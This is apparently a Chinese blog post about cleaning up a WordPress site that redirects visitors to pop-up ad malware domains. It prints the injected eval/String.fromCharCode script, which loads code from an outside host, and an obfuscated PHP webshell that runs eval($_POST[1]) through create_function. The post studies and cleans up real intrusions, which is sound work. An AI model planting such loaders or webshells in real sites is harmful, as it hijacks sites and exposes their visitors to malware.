wordpress站點被惡意重定向

背景

一個wordpress站點 訪問主站后跳轉至其他惡意域名 抓包看了一下 利用的是302跳轉 而不是直接轉向其他站
跳轉的域名如下

bestprize-places-here1.life
bestanimegame.com
auteartumn10.live
location.lowerbeforwarden.ml
adaranth.com
deloton.com

屬於pop-up AD malware，國內搜索引擎沒搜到什么東西

排錯

一開始上來一臉蒙蔽 看了一些資料后總結如下：

查看js文件 是否有異常

異常js:

<script type=text/javascript>eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,52,54,44,49,49,54,44,49,49,52,44,57,55,44,57,57,44,49,48,55,44,49,49,53,44,49,49,54,44,57,55,44,49,49,54,44,49,48,53,44,49,49,53,44,49,49,54,44,49,48,53,44,57,57,44,49,49,53,44,49,49,53,44,49,49,53,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,48,54,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));</script>

搜索惡意域名 或String.fromCharCode，不過還是要以實際js文件出現異常為主，畢竟只是一種編碼方式

檢查php文件

會不會被植入了webshell
.htacess文件有沒有被修改
wp-config.php有沒有問題
這里因為沒有拿到源代碼沒法進行排查
在知乎上看到一段

找到問題了 被植入了webshell 三個馬 都有混淆
一個小馬

<?php 
$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);
echo $_cC; //eval($_POST[1])
echo $_fF;//create_function
@$_();
?>

檢查數據庫

數據庫是因為wp_options和wp_post兩張表里有涉及主站url地址，這個被修改可能會導致問題發生

惡意攻擊通常會篡改 wp_options 中的 siteurl 值和 home 值，使得用戶訪問站點時，站點 URL 部分被替換成惡意網站，實現跳轉，並且由於 /wp-admin 的訪問也會校驗站點地址，所以我們甚至無法登錄后台去修改回來。

被感染的原因

這個查了很多都沒找到結果 郵件咨詢了一位老外 他認為是插件plugins or themes引起的問題，比如最近的FileMangager漏洞，但是這個wordpress站點沒有使用

查了js和數據庫備份 都沒找到

參考鏈接：
https://guides.magefix.com/2020/08/go-donatelloflowfirstly-ga/
https://guides.magefix.com/2020/09/lowerbeforwarden-ml/
https://okeyravi.com/wordpress-website-malware-fix/#These_are_some_common_reasons_for_a_website_to_be_hacked
https://zhuanlan.zhihu.com/p/220211489